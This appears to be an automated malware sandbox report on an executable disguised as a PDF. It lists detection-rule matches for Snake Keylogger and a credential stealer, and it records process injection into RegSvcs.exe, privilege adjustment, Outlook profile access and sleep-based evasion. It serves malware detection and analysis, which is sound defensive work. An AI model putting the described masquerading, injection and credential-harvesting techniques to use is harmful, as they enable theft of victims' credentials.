                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00753B3A
                Source: PK241200518-EMAIL RELEASE-pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000000.2090017610.0000000000804000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c4dc2221-b
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000000.2090017610.0000000000804000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_df161507-2
                Source: PK241200518-EMAIL RELEASE-pdf.exe | String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c2867a71-5
                Source: PK241200518-EMAIL RELEASE-pdf.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_c96e2510-c
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007A8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007B51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0075E6A0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0077D975
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0075FCE0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007721C5
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007862D2
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007D03DA
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0078242E
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007725FA
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007AE616
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007666E1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0078878F
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007D0857
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00786844
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00768808
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007B8889
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0077CB21
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00786DB6
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00766F9E
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00763030
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0077F1D9
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00773187
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00751287
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00771484
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00765520
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00777696
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00765760
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00771978
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00789AB5
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007D7DDB
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0077BDA6
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00771D90
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0075DF00
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00763FE0
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00E85460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00BC20C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00BC1240
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_00BC8E78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010E81E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010E5370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010ED2CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010ED599
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010E5968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010EC890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010E7A68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010ECD28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010EAD48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010EEC18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010E5C38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010ECFF7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010EF4BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010EF4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010E29E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010ECA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010EEC0B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_010E3E09
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: String function: 00757DE1 appears 36 times
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: String function: 00770AE3 appears 70 times
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: String function: 00778900 appears 42 times
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2097547998.00000000037B3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PK241200518-EMAIL RELEASE-pdf.exe
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs PK241200518-EMAIL RELEASE-pdf.exe
                Source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.00000000039AD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PK241200518-EMAIL RELEASE-pdf.exe
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: PK241200518-EMAIL RELEASE-pdf.exe PID: 1264, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 5908, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, COVID19.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.PK241200518-EMAIL RELEASE-pdf.exe.3640000.1.raw.unpack, VIPSeassion.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BA06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007A81CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007A87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007BB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007CEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007C83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00754E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | File created: C:\Users\user\AppData\Local\Temp\aut1EA1.tmp
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Command line argument: Pm 0_2_007547D0
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: PK241200518-EMAIL RELEASE-pdf.exe | ReversingLabs: Detection: 63%
                Source: unknown | Process created: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe"
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2099188495.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.0000000003880000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2099188495.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000003.2100560285.0000000003880000.00000004.00001000.00020000.00000000.sdmp
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PK241200518-EMAIL RELEASE-pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00754B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_0075C4C7 push A30075BAh; retn 0075h 0_2_0075C50D
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00778945 push ecx; ret 0_2_00778958
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_007D5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe | Code function: 0_2_00773187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeAPI/Special instruction interceptor: Address: E85084
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599343
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598906
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598796
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598359
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598140
